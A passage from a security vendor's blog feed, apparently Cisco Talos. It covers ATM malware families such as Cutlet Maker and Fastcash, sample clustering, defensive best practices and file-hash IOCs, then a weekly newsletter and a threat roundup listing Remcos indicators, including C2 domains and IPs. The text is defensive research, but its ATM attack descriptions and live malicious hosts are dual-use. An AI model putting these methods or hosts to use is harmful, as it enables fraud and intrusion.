Cutlet, or Cutlet Maker, has been sold as a do-it-yourself ATM malware kit on some underground markets since 2016. The bundle contains detailed instructions in Russian and English on how to infect systems and how to acquire codes required to dispense cash.

Main Cutlet Maker user interface.

The Cutlet manual details operational security practices required to avoid being caught by law enforcement officers and shows where to drill holes in the ATM enclosure in order to access USB ports of a specific ATM model. The kit also contains a testing application named "Stimulator" for users to practice before they decide to conduct real attacks.

Cutlet follows a similar pattern to the previous ATM malware. The owner of the kit has the ability to generate codes per ATM required for its operation.

Fastcash

The significance of Fastcash malware is its mode of operation and its targeting of IBM AIX operating system. Fastcash consists of a process injector and shared objects presumably injected into the process space of compromised bank payment authorization systems. The malware monitors ISO8583-based transactions using code from a fairly old open-source library for parsing ISO8583 packets.

If an ATM transaction contains the attackers' codes, the data will not be forwarded to the original payment authorisation application and the transaction approval will be sent back to the target ATM system allowing attackers to dispense cash.

This mode of operation is similar to some rootkits, where malware attempts to hide its presence on the system by modifying the responses sent back from the operating system to the application that attempts to list system objects such as files or processes. The returned list is usually modified to remove names of processes that belong to the malware.

Fastcash has been attributed to the Lazarus Group and it is an example of a nation-state-related actor targeting financial systems for the attacker's financial benefit. Fastcash shows a level of sophistication and knowledge that is not seen in other, run-of-the-mill, ATM malware.

Code sharing between families

Thanks to Xylitol and the ATM Cybercrime tracker, it was easy to retrieve a fairly complete ATM malware data set, with the addition of the few files connected with the Fastcash campaign.

The data set contains 121 files and it is well suited for analysis and clustering. Out of 121 files, there are 114 PE files and those were used for clustering using the static analysis techniques. Out of 114 PE files there were 37 packed files which may not be suitable for static analysis techniques and 20 DLLs.

While investigating various methods for clustering, we stumbled upon an interesting book, "Malware Data Science" by Joshua Saxe and Hillary Sanders. This book shows basic and more advanced methods for classifying and clustering malicious files and used some of the ideas to cluster our own set.

In our case, the clustering was conducted by extracting the following attributes of each sample:

Strings extracted from the file
Disassembled code from the entry point of the file
File entropy and the presence of a known packer
Imported or exported functions
Embedded resources

After collecting the attributes from each sample, Jaccard distance is calculated for every pair of the files in the set. The Jaccard index is a measure of similarity between two sets. The more similar the two samples are, the higher their Jaccard index will be. The index is a number between 0 and 1. For example, the Jaccard index of 0.5 indicates 50 percent overlap between the two sets.

Clusters with Jaccard index threshold of 0.7.

We need to set the threshold required for two samples to be connected as a part of a single cluster. The higher the Jaccard threshold we choose, the more related will be the members of the defined cluster. By varying the threshold we come to the optimal value for our purpose. For example, for correct classification of samples we should choose the value higher than 0.7, and for code sharing purposes, higher than 0.3.

As expected, the results show that as we lower the thresholds we see more clusters appear and some of the clusters show overlap between distinct ATM malware families.

Clusters with Jaccard index threshold of 0.3.

The width of the lines in the graph show how strongly the files in the clusters are related. For example, we see that the members of individual GreenDispenser, Tyupkin or DispCash clusters are very closely related, while mixed Ligsterac/Skimer, Tyupkin/Dispcash and ATMtest/Helloworld clusters show weaker connections that likely indicate some overlap in the malware code.

Protection and detection best practices

When considering protection and detection of attacks with ATM malware, it is important to consider the physical security of ATMs, the security of software running on the system and the security of any segment of the organization's network that communicates with ATMs.

Here are 15 best practices that organizations should follow when considering protection of ATMs networks and successful and timely detection of attacks when they happen.

Ensure ATMs and all related systems run up-to-date software and the latest operating system versions with the latest security patches applied.
Disable Windows AutoPlay and configure BIOS to disable the ability to boot software from USB sticks and CD/DVD drives. Set strong BIOS password protection to prevent boot settings from being changed.
Disable access to the Windows desktop at the ATM, ensure RDP sessions are secured with multiple authentication factors such as Duo Authentication for Windows Logon and RDP.
Remove any unused services and applications from the system to reduce the attack surface. Implement other measures to harden the underlying ATM operating system.
Monitor the operation of ATMs, as well as their physical integrity. Look for unusual patterns of resets, communication failures and transaction volume.
Implement strong encryption between the ATM and the host.
Ensure access to the ATM cabinet is restricted to authorized persons and that such access is electronically logged.
Perform a security assessment of ATMs, including their physical locations and any networks connecting to them.
Ensure that firewalls and anti-malware protection are correctly configured.
Configure whitelisting solutions or operating system features to allow only known, trusted software to run. Make sure that whitelisting cannot be disabled without generating a remote log entry.
Prevent unauthorized USB devices from being installed using a device control function.
Educate employees about how they can avoid introducing malware into operational systems.
Maintain a physically and logically segmented network environment throughout the organization using segmentation technology such as Cisco TrustSec.
Ensure visibility over network traffic to ATM systems and payment authorisation servers using technology that enhance network visibility, such as Cisco Stealthwatch.
Monitor threat intelligence feeds to learn about newly detected ATM malware threats.

Conclusion

ATM malware is a niche area attacks, but it potentially brings significant benefits to actors that successfully manage to deploy it. Over 10 years since the discovery of the first specialized malicious code targeting the Diebold Agilis line of ATMs, we have seen over 30 other malware families with varying degrees of sophistication, complexity and success. Most of the successful attacks are reported in countries where the ATMs are older, such as some Latin American countries and Eastern Europe.

While the majority of actors behind ATM malware seem to be less sophisticated criminal actors, the potential of being able to dispense large amounts of cash also attracts more sophisticated criminal groups such as Carbanak and Cobalt Gang, as well as some state-sponsored actors such as Lazarus.

Although the number of known malware samples for ATMs has been very low there has been a steady increase in the trendline for number of discovered samples year over year.

Financial organizations and banks have to be particularly vigilant when considering protection against malware for ATMs and payment systems. Enterprises and individuals may also experience financial loss due to potential of their card details being used for illegal transactions after being skimmed by ATM malware. Best practices should be followed to ensure the highest possible level of protection and organizations should invest into increasing user awareness about the dangers of ATM malware.

Coverage

Additional ways our customers can detect and block these threats are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. Below is a screenshot showing how AMP can protect customers from this threat. Try AMP for free here.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs

Sha256

Alice

04f25013eb088d5e8a6e55bdb005c464123e6605897bd80ac245ce7ca12a7a70
23c50f1c37b7c55554c282ba1781e9d6279cbbd7bfc5f64772d2e7a8962ebe70
b8063f1323a4ae8846163cc6e84a3b8a80463b25b9ff35d70a1c497509d48539
db1169df116fda46319c4b87607df7b6a5e80b48de5411d47684974ca22dd35a
e3bf733cc85da7421522a0b1ff788d43bcacd02815a88d19426e80de564174b3

ATMii

0ef71569308d44e89bde48096c67caf73ec177c1c970a2fd843fd3a094502d78
5f5d483c1fcd1638b32d11183c5ed5fd36362fb12d62e1d9940b47906733d672
7fac4b739c412b074ee13e181c0900a350b4df9499515febb75008e6955b9674
d74cbd2e39dc0a00dc4c0fb0823c5a86455cdad2be48d32866165c9e5557c3e0

DIAGK

03bb8decefc540bff5b08425adddb404b345452c8adedee0c8af13572891865b

Cutlet

05fae4bef32daf78a8fa42f8c25fdf481f13dfbbbd3048e5b89190822bc470cd
4a340a0a95f2af5ab7f3bfe6f304154e617d0c47ce31ee8426c70b86e195320c
c18b23cc493f89d73a2710ebb177d54beafe0edf0e17cc79e28d9efdfb69a630
d1a0b2a251fa69818784e8937403c18f09b2c37eead80ba61a3edf4ac2b6b7ff
d4a463c135d17239047ad4151ab2f2d084e223970e900904ecedabc0fd916545
fe1634318e27e3af856506d49a54d1d12e1cf650cbc31eeb0c805949edc8fc85

Piolin

5f4215368817570e7a390c9f6e265a7db343c9664d22008d5971dac707751524

Prilex

d10a0e0621a164fad0d7f3690b5d63ecb9561e5ad30a66f353a98395b774384e

WinPot

0720db2469a61d41c1e67a8f32020927a32422a5d58067bb328a2ff407e14e98
3f5ff48aa4dc2c1af3deeb33a9cc576616dad37156ae9182831b1b2a5ae4ae20
a5d0cd1bc33f44d25695ebd6530757180f4fc4d87a1658ee2f0d8fc42d09fb80
c3a5c8e9195163cef8e0e70bd8f3d49c8048e37af7c969341e1753aee63df0ae
d9c6515fd0fb3cd14b4bb4d11ecda78602d17f370780a4b9ee006a9830106213

ATMitch

1065502d7171df7be3776b839410a227c540cd977e5e856bbbcd837b0872bdb6
ea5ebd1e5f98e10b1e7c834dd54707ad06772bccb4179cae7e50c7e6e772a1ab

ATMtest

9f8a7828d833ed7f28f9f5ceaf1c073c6de0645172b8316d86edc16c84b61c4f

ATMWizX

7bd2c97ac5027c360011dc5aa8f2371cd934f73e885e41f7e80152332b3af1db
a4b42f503090cd3cd53963ddaf0be3e4eeedbd81ff02664668e68612816e727f

Ploutus

0106757fac9d10a8e2a22dce5337f404bfa1c44d3cc0c53af3c7539888bc4025
04db39463012add2eece6dfe6f311ad46b76dae55460eea30dec02d3d3f1c00a
0971c166826163093093fb199d883f2544055bdcfc671e7789bd5088992debe5
0e37b8a6711a3118daa1ce2e2f22c09b3f3c6179155b98215a1d96a81c767889
34acc4c0b61b5ce0b37c3589f97d1f23e6d84011a241e6f85683ee517ce786f1
398e335f2d6379771d86d508a43c567b4156104f89161812005a6122e9c899be
62b61f1d3f876300e8768b57d35c260cfc60b768a3e430725bd8d2f919619db2
7fd109532f1e49cf074be541df38e0ce190497847fdb5588767ca35b9620a6c2
aee97881d3e45ba0cae91f471db78aded16bcff1468d9e66edf9d3c0223d238f
c8d57b32ab86a3a97f89ae7f1044a63cca2b58f748bed250a1f9df5c50fc8fbb
d93342bd12ef44d92bf58ed2f0f88443385a0192804a5d0976352484c0d37685
d99339d3dc6891cdd832754c5739640c62cd229c84e04e9e3cad743c6f66b1b9
e75e13d3b7a581014edcc2a397eaffbf91c3e5094d4afd81632d9ad872f935f4

Suceful

c7cb44e0b075cbc90a7c280ef8f1c69e8fe06e7dabce054b61b10c3105eda1c4
d33d69b454efba519bffd3ba63c99ffce058e3105745f8a7ae699f72db1e70eb

Tyupkin

16166533c69f2f04110e8b8e9cc45ed2aeaf7850fa68845c64d92ff907dd44f0
3639e8cc463922b427ea20dce8f237c0c0e82aa51d2502c48662e60fb405f677
639d2d926325275cb023014d0b446d03f1dcc8526bff1aa72373e27d78a6a674
646433de5c56fdbc7e6e934a05e9e99012ef39a0ed6cc4bdb1d984cd4435379e
6c59cd1e12bc1037031af48b934e9398fc85efb2a067d03b6a100dd8423e5d9b
853fb4e85d8b0ad7c156ad6d3fc4b0340c8b29fa0548a3df758e7845ba8b23ae
8bb5c766de0a73dc0eff7c9fce086565b6220465185e258c21c5b9dfb0bef51d
b670fe2d803705f811b5a0c9e69ccfec3a6c3a31cfd42a30d9e8902af7b9ed80

SkimerWC

dff7ee95100ffaec5848a73a7b306eaaee94ae691dfccff9fe6ce0a8f3b82c56
e267fb3044c31256f06dd712c7aeae97ad148fd3157995a7e536e5473c1a2bc0
e78e6155b8dfd206ba5a5e7253409891bfed1b943d217e0fbc416a25fa761580

ATMitch.B

66db5b6b5dc51de7e5380f214f703bdc69ab3c3bec7c3b67179940a06560f126

ATMripper

21f3c0bf3fc05685ec5b7bf3c98103761894d7c6783c2c12afae958eb103598e
22db6a994eb057715b499c5641cc608fb0380aeea25f78180436c35ecd81ce7d
3d8c7fb9e55f96cf3073b321ee5e59ff2189d70b0662bc0b88990971bc8b73d8
4c98d5cd865d7fe2f293862fae42895045e43facfdd2a3495383be4ddbb220dc
64499b2584d239380ffecf07e94167e0414c4bb5438620659fe37d595ef3f361
cc85e8ca86c787a1c031e67242e23f4ef503840739f9cdc7e18a48e4a6773b38
e3a6970d66bc4687b21381353826fabd469007c869efc711fdd0e4711aa77ffc

Ligsterac

1243c478a7145fa08a03200611fcf5fae9bb58039c5069ef93e150d53cf22524
377f85562e9ec16cae8fed87e43b6dd230eaa6e1c8f2732f5096f1ec951f045a
aaeee605cb1850dd81da8990fe4115fe85e5d4eb84ddaf2fa8d0b21afdc2b293
b361963fe11b149afc526a6e0656c08226f943bdba0f2c7c0a7640fba09afce8
e130bc1603893155d87946a430b6d6ad167760cde24aa2834c61dd0eace30e8e

NeoPocket

85652bbd0379d73395102edc299c892f21a4bba3378aa3b0aaea9b1130022bdd

Atmosphere

26b2daa6fbf5ec13599d24e6819202ddb3f770428d732100be15c23be317bd47
5c838658b25d44edab79a4bd2af7c56bef96768b93addbbaaaea36da604fca62
956968e6f4bf611137ea0e747891ba8dc200ca809c252ef249294912fb3dbe3c
a6c33d7275c46397593f53ea136ea8669794f4d787044106594631c07a9ee71d
d60126545fa68b14c36cd4cffa3f81ed487381482582acbba786fa88884f636b
eeb8390e885612e1f0b8f8922baa4ebc9ba420224b30370d08b45f3453949937

ATMSpitter

4035d977202b44666885f9781ac8755c799350a03838ff782eb730c0d7069958
85e5aacbc9113520d93f1d9d73193c3501ebab8032661052d9a66348e204cde6
8770f760af320d30681a4eb4ded331eab2481f54c657aac607df8babe8c11a6b
bf20c674a0533e7c0d825de097629a96cb42ae2d4840b07dd1168993d95163e8
c5b43b02a62d424a4e8a63b23bef8b022c08a889a15a6ad7f5bf1fd4fe73291f
e372631f96face11e803e812d9a77a25d0a81fa41e4ac362dc8aee5c8a021000
f27e27244233f2bb5b02412d4b05315625928adaa340708e91d61ad3bce54bf6

HelloWorld

2de4a510ee303c04c8d7bd59b7987b22c3471c9f4ba69b5f83ba36de88b63a8d
867991ade335186baa19a227e3a044c8321a6cef96c23c98eef21fe6b87edf6a
f6609bb3c3197ace26ebdeb372ba657ac84b05a3e9e265b5211e1ea42da70dbe

Java/Dispcash

0149667c0f8cbfc216ef9d1f3154643cbbf6940e6f24a09c92a82dd7370a5027
ef407db8c79033027858364fd7a04eeb70cf37b7c3a10069a92bae96da88dfaa

Trojan.Skimer

2721a5a6478bfff2c5de0d105623ba5f411401bbd92bd3e2bee4c51c2d12f5a8
4941331c64e0389d5ec966122ef71a99d8f9830f13e9afa758e03275f896c2eb
5ab6358e1886655257c437ebad71b98a6575313b2f9327359661aac5d450c45a
653701d02c5d8d39b3da9b0848d20921cd65ea28e77c8e9254e222601264bcc6
d90257af70401984d5d41dd057114df88566d00329874ced3103a6f8cd1991e5

GreenDispenser

20a1490b666f8c75c47b682cf10a48b7b0278068cb260b14d8d0584ee6c006a5
50db1f5e9692f217f356a592e413e6c9cb31105a94efc70a5ca1c2c73d95d572
5a37be2d298145b766ba54616677d802cfabc62e3b9be2ffb6d4719d3f8143e9
7544e7a798b791cb36caaa1860974f33d30bc4659ceab3063d1ab4fd71c8c7e0
77850f738ba42fd9da299b2282314709ad8dc93623b318b116bfc25c5280c541
b7e61f65e147885ec1fe6a787b62d9ee82d1f34f1c9ba8068d3570adca87c54f

ATM.DispCash.3

622d7489208578eaaaae054a07e16b4b8c91a3fde6e61d082a09aee5a1b1f829
b00cd2ca5247c93e3a40f73006051bbfada3b1bc73c4d44105384824bb60131d
b66615b186bf7067cdb937220f86b1d9411351e0b06ee8d02cf6c5358348e884
9feea4b7a5b438335353bb4eac82f8f2a16232a90b7cddbf77dc73dd451e9a6e
6efedf9bde951ad6c3e240ec498767bb693ecc8fa62040e624c5a7fa21c5bdaa

Trojan.Fastcash

d465637518024262c063f4a82d799a4e40ff3381014972f24ea18bc23c3b27ee
ca9ab48d293cc84092e8db8f0ca99cb155b30c61d32a1da7cd3687de454fe86c
10ac312c8dd02e417dd24d53c99525c29d74dcbc84730351ad7a4e0a4b1a0eba
3a5ba44f140821849de2d82d5a137c3bb5a736130dddb86b296d94e6b421594c

Skimer

34e7060e7a0c0ba24fcb55c641e5b586cef744e10ebd5a9f73ecd2ed2f4e9c1f
b51973c530802ae19df8ac4d9643fc3317952242d9d42f951e094c72d730dd66
359bb8596e4befafdaca706630bec598400694305622c116acdfa59074f1858e
ac8e8216e71e078198ef67d4cb48118767d0696610a02137492814422153d3c6
7888e9a27b27f026f09997414504be5822f35b69ddec826eb2a56f6347e2d147
cde6f7fb2fbdefffe22a012295ab157cffc07cab26ba0e34ced0bae484355187
b39c5992c2cb70c76c82d6fba3cc0b7972c2f9b35227934b766e810f20a5f053

WinPotv3

009b677564b3ebb0831171edf3fb0deb0fa3b0010b74586e01d8df4af965ef3f
1d6508cbe5f7ccaa991572f05aef52bab8a59851ca9a4367605a9637b10ae081
20fb2edfcece271f87d006e263c4a6de48ed518901211a76dc38aac43e1b9d19
6670ccc940cca6983340dbce1a9bbce7b49643ac924e18ca25def8b632b70720
70cc5070ce058682c1d44cef887c0ec8a50dba6b717802c5a8f2c8f2ed377c13
8d7f932d8236671018c5cd02781301134aa6df315253f7a56559350d2616ff8e
b57bc410683aba4c211e407320e6b7746ce25e06d81ddf480711228efd921a6c
e2c87bca353016aced41305ddd66ee7430bf61a20c0f4c8c0f0650f006f05160

↧

Threat Source newsletter (May 30)

May 30, 2019, 11:00 am

≫ Next: Threat Roundup for May 24 to May 31

≪ Previous: 10 years of virtual dynamite: A high-level retrospective of ATM malware

Newsletter compiled by Jonathan Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

Did you update all of your Microsoft products after Patch Tuesday earlier this month? If not, what are you waiting for? Listen to the latest Beers with Talos episode about why that’s stupid, and then immediately update.

Last week marked the one-year anniversary of VPNFilter. What has the security community learned since then? And how did this wide-reaching malware shape attacks since then? Find out in our blog post looking back on VPNFilter.

If you haven’t already, there’s still plenty of time to sign up for our upcoming spring Quarterly Threat Briefing. Talos researchers will be running down recent DNS manipulation-based attacks, and outline why your organization needs to be worried about them.

Finally, we also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.

Upcoming public engagements with Talos

Event: Bsides London
Location: ILEC Conference Centre, London, England
Date: June 5
Speaker: Paul Rascagnères
Synopsis: Privacy has become a more public issue over time with the advent of instant messaging and social media. Secure Instant Messaging (SIM) has even become a problem for governments to start worrying about. While many people are using these messaging apps, it’s opened up the door for attackers to create phony, malicious apps that claim to offer the same services. In this talk, Paul will show various examples of these cloned applications and the different techniques used to send data back to the attacker.

Event: Cisco Connect Norway
Location: X Meeting Point, Skjetten, Norway
Date: June 6
Speaker: Vanja Svajcer
Synopsis: Vanja will offer a glimpse at how Cisco Talos analyzes the modern threat landscape and what customers can do to achieve a greater level of security.

Event: “It’s never DNS...It was DNS: How adversaries are abusing network blind spots” at SecTor
Location: Metro Toronto Convention Center, Toronto, Canada
Date: Oct. 7 - 10
Speaker: Edmund Brumaghin and Earl Carter
Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more.

Cyber Security Week in Review

The city of Baltimore estimates the cost of a recent ransomware attack is approximately $18.2 million. Officials have refused to pay the ransom to retrieve its data.
The latest version of the HawkEye keylogger was used in a recent attack against several different industries. HawkEye Reborn, which was discovered by Cisco Talos in April, was spotted being used against several companies, including those in the health care, agriculture and marketing industries.
Secure email provider ProtonMail pushed back on claims that it offers assistance to law enforcement agencies in tracking suspects. The company called statements made by a Swiss lawyer on his blog “factually incorrect.”
Apple released updates to iTunes and iCloud for Windows. The patches fix vulnerabilities recently disclosed in SQLite and WebKit.
Chinese tech company Huawei asked a court to declare a ban on its products in the U.S. unconstitutional. A summary issued by the company states that the ban came without concrete facts that it poses a national security risk to Americans.
Parts of New Zealand’s national budget were released early as part of an alleged cyberattack. The country’s treasury secretary contacted law enforcement after his agency discovered 2,000 attempts to access secret budget documents.
The fast-food chain Checkers says its restaurants in at least 20 states were hit with credit card-skimming malware. An unknown number of customers had their names, payment card numbers and card expiration dates stolen as part of the attack.
A school district in New York will start testing facial recognition technology next week. The system is expected to be fully operational by the start of the next school year on Sept. 1.

Notable recent security issues

Title: Vulnerability could allow JavaScript to be injected into Internet Explorer 11
Description: Researchers uncovered another Microsoft zero-day vulnerability. One of the critical bugs could allow an attacker to inject a DLL into Internet Explorer 11. After the injection, the exploit opens a filepicker and an HTML page that contains JavaScript that executes in a lower security context. There is also a zero-day privilege escalation vulnerability in Windows Error Reporting.
Snort SIDs: 50183, 50184

Title: Winnti malware now appears on Linux
Description: A new variant of the Winnti malware has been spotted in the wild being exploited on Linux machines. The malware acts as a backdoor for attackers. There are two different files — a main backdoor and a library that can hide the malware’s activity. Winnti’s primary role is to handle communications and deploy other modules directly from the command and control (C2) server.
Snort SIDs: 50164 - 50167

Most prevalent malware files this week

SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3
MD5: 47b97de62ae8b2b927542aa5d7f3c858
Typical Filename: qmreportupload.exe
Claimed Product: qmreportupload
Detection Name: Win.Trojan.Generic::in10.talos

SHA 256: f08f4374674a8993ddaf89dcaf216bc6952d211763b8489366b0835f0eda1950
MD5: b9a5e492a6c4dd618613b1a2a9c6a4fb
Typical Filename: maf-task.zip
Claimed Product: N/A
Detection Name: PUA.Osx.Adware.Gt32supportgeeks::221862.in02

SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f
MD5: e2ea315d9a83e7577053f52c974f6a5a
Typical Filename: Tempmf582901854.exe
Claimed Product: N/A
Detection Name: W32.AgentWDCR:Gen.21gn.1201

SHA 256: 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b
MD5: 799b30f47060ca05d80ece53866e01cc
Typical Filename: 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b.bin
Claimed Product: N/A
Detection Name: W32.Generic:Gen.22fz.1201

SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510
MD5: 4a50780ddb3db16ebab57b0ca42da0fb
Typical Filename: wup.exe
Claimed Product: N/A
Detection Name: W32.7ACF71AFA8-95.SBX.TG

↧

Threat Roundup for May 24 to May 31

May 31, 2019, 9:42 am

≫ Next: Using Firepower to defend against encrypted RDP attacks like BlueKeep

≪ Previous: Threat Source newsletter (May 30)

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 24 and May 31. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.

The most prevalent threats highlighted in this roundup are:

Win.Malware.Remcos-6978637-1
Malware
Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. Remcos is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.LokiBot-6978650-0
Dropper
Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from a number of popular applications. It is commonly pushed via malicious documents delivered via spam emails.
Win.Dropper.Kovter-6978831-0
Dropper
Kovter is known for it's fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. Kovter is capable of reinfecting a system even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
Doc.Downloader.Emotet-6978977-0
Downloader
Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Txt.Downloader.Nemucod-6979968-0
Downloader
Nemucod is a trojan that executes ransomware on a victim's computer.
Win.Dropper.Qakbot-6984556-0
Dropper
Qakbot, aka Qbot, has been around since at least 2008. Qbot primarily targets sensitive information like banking credentials but can also steal FTP credentials and spread across a network using SMB.
Win.Malware.Kryptik-6983260-1
Malware
Kryptik is oftentimes a generic detection name for a Windows trojan. Some of the malicious activities that could be performed by these samples, without the user's knowledge, include collecting system information, downloading/uploading files and dropping additional samples.
Win.Ransomware.Gandcrab-6984356-1
Ransomware
GandCrab is ransomware that encrypts documents, photos, databases and other important files typically using the file extension ".GDCB", ".CRAB" or ".KRAB." GandCrab is spread through both traditional spam campaigns, as well as multiple exploit kits, including Rig and GrandSoft.
Win.Malware.DarkComet-6983986-1
Malware
DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system.

Threats

Win.Malware.Remcos-6978637-1

Indicators of Compromise

Registry Keys	Occurrences
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: Mozilla`	9
`<HKCU>\Software\Microsoft\Windows Script Host\Settings`	1
`<HKCU>\Software\Remcos-8L6ET9`	1
`<HKCU>\SOFTWARE\REMCOS-8L6ET9 Value Name: exepath`	1
`<HKCU>\SOFTWARE\REMCOS-8L6ET9 Value Name: licence`	1
`<HKCU>\Software\Remcos-DMGAK8`	1
`<HKCU>\SOFTWARE\REMCOS-DMGAK8 Value Name: exepath`	1
`<HKCU>\SOFTWARE\REMCOS-DMGAK8 Value Name: licence`	1
`<HKCU>\Software\explorer-N7CBD4`	1
`<HKCU>\SOFTWARE\EXPLORER-N7CBD4 Value Name: EXEpath`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: explorer`	1
`<HKCU>\SOFTWARE\EXPLORER-N7CBD4 Value Name: WD`	1
`<HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\34ONMET3ZF`	1
`<HKCU>\Software\Remcos-LMBBE5`	1
`<HKCU>\SOFTWARE\REMCOS-LMBBE5 Value Name: exepath`	1
`<HKCU>\SOFTWARE\REMCOS-LMBBE5 Value Name: licence`	1
`<HKCU>\Software\Remcos-A2GPXU`	1
`<HKCU>\SOFTWARE\REMCOS-A2GPXU Value Name: exepath`	1
`<HKCU>\SOFTWARE\REMCOS-A2GPXU Value Name: licence`	1
`<HKCU>\Software\Remcos-4ACKPE`	1
`<HKCU>\SOFTWARE\REMCOS-4ACKPE Value Name: exepath`	1
`<HKCU>\SOFTWARE\REMCOS-4ACKPE Value Name: licence`	1
`<HKCU>\SOFTWARE\REMCOS-4ACKPE Value Name: FR`	1

Mutexes	Occurrences
`Remcos_Mutex_Inj`	6
`3749282D282E1E80C56CAE5A`	1
`A16467FA-7343A2EC-6F235135-4B9A74AC-F1DC8406A`	1
`eed3bd3a-a1ad-4e99-987b-d7cb3fcfa7f0 - S-1-5-21-2580483871-590521980-3826313501-500`	1
`\BaseNamedObjects\Mutex_RemWatchdog`	1
`\BaseNamedObjects\3BA87BBD1CC40F3583D46680`	1
`Remcos-8L6ET9`	1
`Remcos-DMGAK8`	1
`explorer-N7CBD4`	1
`Remcos-LMBBE5`	1
`Remcos-A2GPXU`	1
`Remcos-4ACKPE`	1
`\BaseNamedObjects\explorer-N7CBD4`	1

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
`91[.]193[.]75[.]9`	2
`184[.]75[.]209[.]157`	1
`91[.]193[.]75[.]115`	1
`46[.]105[.]127[.]143`	1
`185[.]244[.]31[.]63`	1
`47[.]254[.]172[.]117`	1
`185[.]247[.]228[.]210`	1

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
`uaeoffice999[.]warzonedns[.]com`	2
`ml[.]warzonedns[.]com`	1
`begurtyut[.]info`	1
`ableyahweh[.]ddns[.]net`	1
`kingmethod111[.]duckdns[.]org`	1
`amblessed[.]ddns[.]net`	1
`kobiremcos2[.]punkdns[.]top`	1
`bio4kobs[.]geekgalaxy[.]com`	1
`kobiremcos3[.]punkdns[.]top`	1
`kobiremcos[.]punkdns[.]top`	1

Files and or directories created	Occurrences
`%LOCALAPPDATA%\TVcard.exe`	9
`%LOCALAPPDATA%\Mozilla\StatsReader.exe`	9
`%LOCALAPPDATA%\Thex.bmp`	9
`%APPDATA%\remcos`	5
`%APPDATA%\remcos\logs.dat`	5
`E:\TVcard.exe`	5
`\TVcard.exe`	5
`%HOMEPATH%\Local Settings\Application Data\TVcard.exe`	5
`%HOMEPATH%\Local Settings\Application Data\Mozilla\StatsReader.exe`	5
`%LOCALAPPDATA%\Mozilla\MiniConvert.exe`	5
`%LOCALAPPDATA%\Sys.ocx`	5
`%HOMEPATH%\Local Settings\Application Data\Thex.bmp`	5
`%ProgramData%\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol`	3
`%LOCALAPPDATA%\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol`	3
`%HOMEPATH%\Local Settings\Application Data\Mozilla\MiniConvert.exe`	3
`%HOMEPATH%\Local Settings\Application Data\Sys.ocx`	3
`%APPDATA%\D282E1\1E80C5.lck`	1
`%APPDATA%\D1CC40\0F3583.hdb`	1
`%APPDATA%\D1CC40\0F3583.lck`	1
`\??\E:\explorer.exe`	1
`\explorer.exe`	1
`%ProgramFiles%\Microsoft DN1`	1
`%APPDATA%\D1CC40\0F3583.exe (copy)`	1
`%LOCALAPPDATA%\Microsoft Vision`	1
`%TEMP%\install.vbs`	1
See JSON for more IOCs

File Hashes

254cc60f64f6db8b54b2033d95f57f6a7f5c8ceea890ccc85f74570eab725b56
5246657574c87126f2bd268b17f5a4bc44e4dd256cf6eff493c2250c7b1c3d3e
5325269f4a381c1c7815863de0dd50b208944993d1f61c38a9f521be609827de
585f0d663b32f025514e3740e5ac8dd007f777ce0c384fe664b3266c4159289d
